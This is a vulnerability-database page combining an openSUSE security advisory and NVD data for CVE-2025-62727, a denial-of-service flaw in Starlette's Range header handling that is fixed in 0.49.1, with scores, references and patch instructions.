          "product_id": "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.s390x"
        },
        "product_reference": "python313-starlette-0.49.1-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-starlette-0.49.1-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.x86_64"
        },
        "product_reference": "python313-starlette-0.49.1-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-62727",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-62727"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Starlette is a lightweight ASGI framework/toolkit. Prior to 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial-of-service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.aarch64",
          "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.s390x",
          "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.x86_64",
          "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.aarch64",
          "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.ppc64le",
          "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.s390x",
          "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.x86_64",
          "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.aarch64",
          "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.s390x",
          "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-62727",
          "url": "https://www.suse.com/security/cve/CVE-2025-62727"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1252805 for CVE-2025-62727",
          "url": "https://bugzilla.suse.com/1252805"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.aarch64",
            "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.s390x",
            "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.x86_64",
            "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.aarch64",
            "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.s390x",
            "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.x86_64",
            "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.aarch64",
            "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.s390x",
            "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.aarch64",
            "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.s390x",
            "openSUSE Tumbleweed:python311-starlette-0.49.1-1.1.x86_64",
            "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.aarch64",
            "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.s390x",
            "openSUSE Tumbleweed:python312-starlette-0.49.1-1.1.x86_64",
            "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.aarch64",
            "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.s390x",
            "openSUSE Tumbleweed:python313-starlette-0.49.1-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-11-01T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2025-62727"
    }
  ]
}

fkie_cve-2025-62727

Vulnerability from fkie_nvd

Published

2025-10-28 21:15

Modified

2025-11-04 18:16

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5
	security-advisories@github.com	https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c
	security-advisories@github.com	https://github.com/Kludex/starlette/releases/tag/0.49.1
	security-advisories@github.com	https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1."
    }
  ],
  "id": "CVE-2025-62727",
  "lastModified": "2025-11-04T18:16:45.480",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-10-28T21:15:40.447",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Kludex/starlette/releases/tag/0.49.1"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-407"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-62727 (GCVE-0-2025-62727)

Vulnerability from cvelistv5

ghsa-7f5h-v6xp-fcq8

Vulnerability from github

Summary

Details

starlette/responses.py

PoC

!/usr/bin/env python3

Impact

opensuse-su-2025:15696-1

Vulnerability from csaf_opensuse

fkie_cve-2025-62727

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature